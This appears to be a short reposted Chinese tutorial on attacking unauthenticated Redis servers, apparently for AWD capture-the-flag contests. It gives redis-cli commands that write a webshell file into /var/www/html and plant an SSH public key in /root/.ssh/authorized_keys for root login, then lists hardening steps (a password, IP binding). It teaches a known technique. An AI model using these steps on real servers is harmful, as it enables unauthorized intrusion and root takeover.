本文共 751 字,大约阅读时间需要 2 分钟。
漏洞成因:
启动redisredis-server /etc/redis.conf
利用方式:常用第一种
需要拥有读写权限
需要知道web目录,AWD中目录一样。 进入redis的src目录,执行登录命令 ./redis-cli -h 目标ip执行以下命令进行写入webshell
config set dir /var/www/html 指定写入目录config set dbfilename shell.php 指定shell文件名set webshell " " 指定shell内容save或bgsave
就可以成功在/var/www/html写入shell.php文件
使用条件:靶机redis需要以root权限运行
攻击机生成ssh公钥和私钥,密码设为空进入.ssh,将生成的公钥保存到1.txt
连接靶机redis服务
将存有ssh公钥的1.txt写入redis。登录redis靶机,获得redis备份路径
更改redis备份路径为ssh公钥存放目录(默认为/root/.ssh)
设置上传公钥的备份文件名字为authorized_keys:
保存并退出
使用ssh免密登录
ssh -i id_rsa root@192.168.0.104
加固方式:
1) 设置密码 编辑etc/redis.conf 添加密码requirepass 密码
2) 设置访问IP
开启ip绑定最后重启redis
转载地址:http://cjlsn.baihongyu.com/